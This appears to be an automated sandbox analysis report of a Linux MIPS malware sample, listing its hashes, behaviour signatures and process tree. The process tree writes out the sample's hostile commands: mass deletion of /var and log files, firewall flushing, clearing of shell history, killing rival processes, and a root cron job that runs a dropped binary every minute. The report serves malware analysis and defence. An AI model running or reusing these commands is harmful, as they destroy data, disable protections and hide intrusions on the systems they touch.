Analysis
-
max time kernel
150s -
max time network
142s -
platform
debian-12_mipsel -
resource
debian12-mipsel-20240221-en -
resource tags
-
submitted
19/08/2024, 01:54
General
-
Target
edf45e54e711e0beff500c86b6ba61af6f360f278b40be51507612855516ec53.elf
-
Size
159KB
-
MD5
e5147a8fa220a02779dfd16b7507839f
-
SHA1
35a7290e4d4059fe9b1446fc621775cb32e89f69
-
SHA256
edf45e54e711e0beff500c86b6ba61af6f360f278b40be51507612855516ec53
-
SHA512
4e81492402745a7fa10574c2488244fe72f63cd27ab8f6756e765c4b21606a82ea5cf11f202a979f7cdb6008bee4ea46b398fc38635b2179bca8bfc59db4b138
-
SSDEEP
3072:JZoDOcH7TvwfmIN+F293W0Quyma9TFUqX6etJ:ADOcbTfyuKQuyma9FpJ
Malware Config
Signatures
-
Deletes Audit logs 1 TTPs 1 IoCs
Deletes logs related to the Linux Audit framework.
-
Deletes journal logs 1 TTPs 3 IoCs
Deletes systemd journal logs. Likely to evade detection.
-
Executes dropped EXE 1 IoCs
-
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Checks mountinfo of local process 1 TTPs 5 IoCs
Checks mountinfo of running processes which indicate if it is running in chroot jail.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Deletes log files 1 TTPs 29 IoCs
Deletes log files on the system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 4 IoCs
-
Reads CPU attributes 1 TTPs 3 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 3 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/edf45e54e711e0beff500c86b6ba61af6f360f278b40be51507612855516ec53.elf/tmp/edf45e54e711e0beff500c86b6ba61af6f360f278b40be51507612855516ec53.elf1⤵
- Modifies Watchdog functionality
- Changes its process name
- Writes file to tmp directory
-
/bin/shsh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"2⤵
-
/usr/bin/rmrm -rf /tmp/edf45e54e711e0beff500c86b6ba61af6f360f278b40be51507612855516ec53.elf /tmp/systemd-private-15e96b3a9e0f41b3a228e22c4085d2a8-systemd-logind.service-q1C16q /tmp/systemd-private-15e96b3a9e0f41b3a228e22c4085d2a8-systemd-timedated.service-fspqOl /var/backups /var/cache /var/lib /var/local /var/lock /var/log /var/mail /var/opt /var/run /var/spool /var/tmp /var/run/atd.pid /var/run/auditd.pid /var/run/console-setup /var/run/credentials /var/run/crond.pid /var/run/crond.reboot /var/run/dbus /var/run/dhclient.enp0s19.pid /var/run/exim4 /var/run/initctl /var/run/initramfs /var/run/lock /var/run/log /var/run/motd.dynamic /var/run/mount /var/run/network /var/run/sendsigs.omit.d /var/run/shm /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/user /var/run/utmp /var/tmp/systemd-private-15e96b3a9e0f41b3a228e22c4085d2a8-systemd-logind.service-g1dnSk /var/tmp/systemd-private-15e96b3a9e0f41b3a228e22c4085d2a8-systemd-timedated.service-SXaRlO /var/log/wtmp3⤵
- Deletes Audit logs
- Deletes journal logs
- Deletes log files
-
-
-
/bin/shsh -c "rm -rf /tmp/*"2⤵
-
/usr/bin/rmrm -rf "/tmp/*"3⤵
-
-
-
/bin/shsh -c "iptables -F"2⤵
-
-
/bin/shsh -c "pkill -9 busybox"2⤵
-
/usr/bin/pkillpkill -9 busybox3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "pkill -9 perl"2⤵
-
/usr/bin/pkillpkill -9 perl3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "pkill -9 python"2⤵
-
/usr/bin/pkillpkill -9 python3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/shsh -c "service iptables stop"2⤵
-
/usr/sbin/serviceservice iptables stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/local/bin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/sbin/systemctlsystemctl stop iptables.service3⤵
-
-
/usr/bin/systemctlsystemctl stop iptables.service3⤵
-
-
-
/bin/shsh -c "/sbin/iptables -F; /sbin/iptables -X"2⤵
-
/sbin/iptables/sbin/iptables -F3⤵
- Flushes firewall rules
-
-
/sbin/iptables/sbin/iptables -X3⤵
- Flushes firewall rules
-
-
-
/bin/shsh -c "service firewall stop"2⤵
-
/usr/sbin/serviceservice firewall stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/local/bin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/sbin/systemctlsystemctl stop firewall.service3⤵
-
-
/usr/bin/systemctlsystemctl stop firewall.service3⤵
-
-
-
/bin/shsh -c "history -c"2⤵
-
-
/bin/shsh -c "rm -rf ~/.bash_history"2⤵
-
/usr/bin/rmrm -rf "~/.bash_history"3⤵
-
-
-
/bin/shsh -c "history -w"2⤵
-
-
/bin/shsh -c "chmod +x /dev/ocmount"2⤵
-
/usr/bin/chmodchmod +x /dev/ocmount3⤵
-
-
-
/bin/shsh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"2⤵
- Creates/modifies Cron job
-
-
/bin/shsh -c /dev/ocmount2⤵
-
/dev/ocmount/dev/ocmount3⤵
- Executes dropped EXE
-
/usr/bin/catcat /proc/822/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/822/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/822/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/822/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
/usr/bin/catcat /proc/822/mountinfo4⤵
- Checks mountinfo of local process
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "/proc/[0-9]*"4⤵
-
-
/usr/bin/grepgrep -o "[0-9]*"4⤵
-
-
/usr/bin/sleepsleep 304⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
479B
MD5a3fc64b86b20a7b2eaa9330e1064d1f1
SHA13a6f294c550a578d5e337f67fd4d9c1984eea885
SHA2566029dd069bc913653eec32e54fb005a80fb71ebb5f0a584c71e06ac08fbbece6
SHA512ce26f2c6ecec049b7053008e323018ec8a709942a456464a1d423f80b92bca410d9b0f661093eb732254e6690900ac9a15b6f62450f72e6511195aee403c50b6
-
Filesize
38B
MD567ec4a157e5b63970cfbb8cc55883ad7
SHA15262b8c108dc3aef69fca6ffd959893de852dc67
SHA2560cb3cc915bb7492ff579f2b59237a5899088e5c5f238125ac9f0b5f73d2723e7
SHA512eb6310992dc6e3ac1fca2bcf26d82365494aa0adbd80ee5ec6231b2418d1daf6608f7820a560b4fbda8c8885a59f8a82ca86aaa481f254d207926c1f6c5802b9